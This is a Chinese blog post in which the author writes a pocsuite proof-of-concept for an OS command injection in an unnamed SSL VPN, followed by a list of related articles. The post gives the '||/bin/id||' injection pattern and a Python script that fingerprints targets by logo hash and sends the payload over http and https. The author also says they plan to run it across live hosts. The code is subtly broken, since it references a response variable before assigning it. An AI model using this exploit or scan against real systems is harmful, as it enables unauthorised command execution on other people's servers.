今天在测试中发现一个命令执行漏洞,尝试用创宇的pocsuite框架实现。说实话,这玩意儿确实没有自己写POC顺手,非得就着他的标准来,就很难受,以至于耽误了很多时间在规范上。。

影响参数后直接用||连接,然后定位linux命令如||/bin/id||

下面是代码部分,大体思路就是发送一个含有payload的post请求,由于涉及一些隐私,我下面的一些地方做了打码:

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 """

 Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)

 See the file 'docs/COPYING' for copying permission

 """

 #命令行

 from pocsuite import pocsuite_cli

 #验证模块

 from pocsuite import pocsuite_verify

 #攻击模块

 from pocsuite import pocsuite_attack

 #控制台模式

 from pocsuite import pocsuite_console

 from pocsuite.api.request import req

 from pocsuite.api.poc import register

 from pocsuite.api.poc import Output, POCBase

 class SSL_VPN(POCBase):

     vulID = ''  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0

     version = '' #默认为1

     vulDate = '2017-11-21' #漏洞公开的时间,不知道就写今天

     author = 'colorway' #  PoC作者的大名

     createDate = '2017-11-21'# 编写 PoC 的日期

     updateDate = '2017-11-21'# PoC 更新的时间,默认和编写时间一样

     references = []# 漏洞地址来源,0day不用写

     name = 'OS Command Injection'# PoC 名称

     appPowerLink = '#'# 漏洞厂商主页地址

     appName = '#'# 漏洞应用名称

     appVersion = 'all versions'# 漏洞影响版本

     vulType = 'Command Injection'#漏洞类型,类型参考见 漏洞类型规范表

     desc = '''

         攻击者可拼接系统命令getshell

     ''' # 漏洞简要描述

     samples = []# 测试样列,就是用 PoC 测试成功的网站

     install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写

     #验证漏洞 pocsuite -r xxxx-OS-Injection.py -f ip.txt --verify

     def _verify(self):

         #定义返回结果

         import hashlib

         import re

         result = {}

         #获取漏洞url

         vul_url = self.url + '/xx/xx/xx.php?xx=xx&t=1&h=127.0.0.1&p=80&c=1||/bin/id||'

         vul1_url = vul_url.replace('http', 'https')

         test_url = self.url + '/images/logo.gif'

         test1_url = test_url.replace('http', 'https')

         # print test_url

         # print test1_url

         r = req.get(test_url)

         r1 = req.get(test1_url, verify=False)

         if hashlib.md5(r1.content).hexdigest() == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' or hashlib.md5(r2.content).hexdigest() == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx':

             data = "xxx=1&xxx=1&auth=10&user_name=11&pass=111&xxxx=xxxx"

             cookies = {'xxxx':'aaaa','admin_token':''}

             r2 = req.post(vul_url, data=data, cookies=cookies)

             r3 = req.post(vul1_url, data=data, cookies=cookies, verify=False)

             if "uid" in r2.content or "uid" in r3.content:

                 result['VerifyInfo'] = {}

                 result['VerifyInfo']['URL'] = self.url

                 result['VerifyInfo']['Payload'] = vul_url             # print r2.content

         return self.save_output(result)

     #漏洞攻击

     def _attack(self):

         result = {}

         # 攻击代码

         return self._verify()

     def save_output(self, result):

         #判断有无结果并输出

         output = Output(self)

         if result:

             output.success(result)

         else:

             output.fail()

         return output

 register(SSL_VPN)

这里我先做了指纹识别,判断目标网站是否有logo并且logo所在文件的MD5值是否正确,是的话进入下面的代码。其他的地方就是我加了https的验证,因为一般资产导入的都是IP地址,前面没有协议的名字,所以我采用了判断两次的方法(感觉是一个笨方法,但目前没有想到其他方法,控制台参数里也没有启用https的参数选项)

今天晚上跑一下存活主机,看看明天能跑出多少台来,嘻嘻。

pocsuite 实现一个verify检测功能的更多相关文章

  1. 打造一个自动检测页面是否存在XSS的小插件

    前言: 还记得刚玩Web安全时,就想着要是能有一个自动挖掘XSS漏洞的软件就好了.然后我发现了Safe3.JSky.AWVS.Netsparker等等,但是误报太多,而且特别占内存.后来发现了fidd ...

  2. [C++]Linux之网络实时检测功能

    声明:如需引用或者摘抄本博文源码或者其文章的,请在显著处注明,来源于本博文/作者,以示尊重劳动成果,助力开源精神.也欢迎大家一起探讨,交流,以共同进步,乃至成为朋友- 0.0 由于学习操作系统实验课程 ...

  3. weblogic 反序列化补丁绕过漏洞的一个批量检测shell脚本(CVE-2017-3248 )

    ~ 以下内容,仅供学习参考 ~ weblogic 反序列化补丁绕过漏洞已经出了两个月了,balabala ~~~ 废话不说,拿到该漏洞的利用工具weblogic.jar,但只能一个个检测ip和端口,效 ...

  4. 第15.4节 PyCharm程序代码检测功能介绍

    老猿使用PyCharm有将近一个月了,发现PyCharm并不能很好的完成语法检查,有时运行时突然终止,仔细核查却发现是基本的语法错误,不过有次无意中移动鼠标到代码最右边的边框时发现其实PyCharm有 ...

  5. 算法与数据结构题目的 PHP 实现:栈和队列 设计一个有 getMin 功能的栈

    刚入手了一本<程序员代码面试指南>,书中题目的代码都是 Java 实现的,琢磨着把这些代码用 PHP 敲一遍,加深印象. 题目:设计一个有 getMin 功能的栈 —— 实现一个特殊的栈, ...

  6. ado.net实现一个通知公告功能

    一.建立相应的数据库,此处就不多说了,相信大家都非常了解

  7. 设计一个有getMin功能的栈

    [说明]: 本文是左程云老师所著的<程序员面试代码指南>第一章中“设计一个有getMin功能的栈”这一题目的C++复现. 本文只包含问题描述.C++代码的实现以及简单的思路,不包含解析说明 ...

  8. SSRS 系列 - 使用带参数的 MDX 查询实现一个分组聚合功能的报表

    SSRS 系列 - 使用带参数的 MDX 查询实现一个分组聚合功能的报表 SSRS 系列 - 使用带参数的 MDX 查询实现一个分组聚合功能的报表 2013-10-09 23:09 by BI Wor ...

  9. 吴恩达机器学习笔记54-开发与评价一个异常检测系统及其与监督学习的对比(Developing and Evaluating an Anomaly Detection System and the Comparison to Supervised Learning)

    一.开发与评价一个异常检测系统 异常检测算法是一个非监督学习算法,意味着我们无法根据结果变量

随机推荐

  1. selenium 安装与环境配置

    selenium的安装 环境配置:python2.7+selenium2+Firefox46以下版本 本次安装环境:python2.7.13+selenium2.53.6+Firefox46 官网下载 ...

  2. Java中多线程并发体系知识点汇总

    一.多线程 1.操作系统有两个容易混淆的概念,进程和线程. 进程:一个计算机程序的运行实例,包含了需要执行的指令:有自己的独立地址空间,包含程序内容和数据:不同进程的地址空间是互相隔离的:进程拥有各种 ...

  3. fastclick.js源码解读分析

    阅读优秀的js插件和库源码,可以加深我们对web开发的理解和提高js能力,本人能力有限,只能粗略读懂一些小型插件,这里带来对fastclick源码的解读,望各位大神不吝指教~! fastclick诞生 ...

  4. (转)source、sh、bash、./执行脚本的区别

    source.sh.bash../执行脚本的区别  原文:https://www.cnblogs.com/sparkbj/p/5976100.html 1.source命令用法: source Fil ...

  5. 【程序员技术练级】学习一门脚本语言 python(二)遍历本地文件系统

    这篇将讲述怎么使用python来遍历本地文件系统,并把文件按文件大小从小到大排序的一个小例子 在这个例子中,主要会用到python内置的和OS模块的几个函数: os.walk() : 该方法用来遍历指 ...

  6. SecureCRT 连接 CentOS虚拟机

    SecureCRT 连接 CentOS虚拟机 1.安装SecureCRT SecureCRT是一款支持SSH等协议的终端仿真软件,可以在windows下登录Linux服务器,这样大大方便了开发工作.安 ...

  7. sublime的reopen with encoding和reload with encoding区别

    首先必需要明白一点,sublime无论以什么编码格式打开文本(以什么编码格式来理解文本文件中的二进制数据),都会把它转为utf-8再显示到屏幕中,这个过程称作解码.其实不当当是sublime,其实任何 ...

  8. 解决VMWARE 虚拟机安装64位系统“此主机支持 Intel VT-x,但 Intel VT-x 处于禁用状态

    VMWARE WORKSTATION 在安装64为操作系统报错,报错内容如图: 错误提示已经很清楚了,需要在BIOS 中打开intel VT-x g功能,开启此功能的前提是: 1.首先要确定的就是你的 ...

  9. Maven工程红色感叹号,且工程无红叉错误

    很可能是jar包不对,可以将maven库里的jar包删除,从 http://mvnrepository.com/ 根据jar包版本号下载到本地maven库,并在pom.xml里引入jar依赖 这次ja ...

  10. socket 客户端和服务端通信

    客户端要连接服务器:首先要知道服务器的IP地址.而服务器里有很多的应用程序,每一个应用程序对应一个端口号 所以客户端想要与服务器中的某个应用程序进行通信就必须要知道那个应用程序的所在服务器的IP地址, ...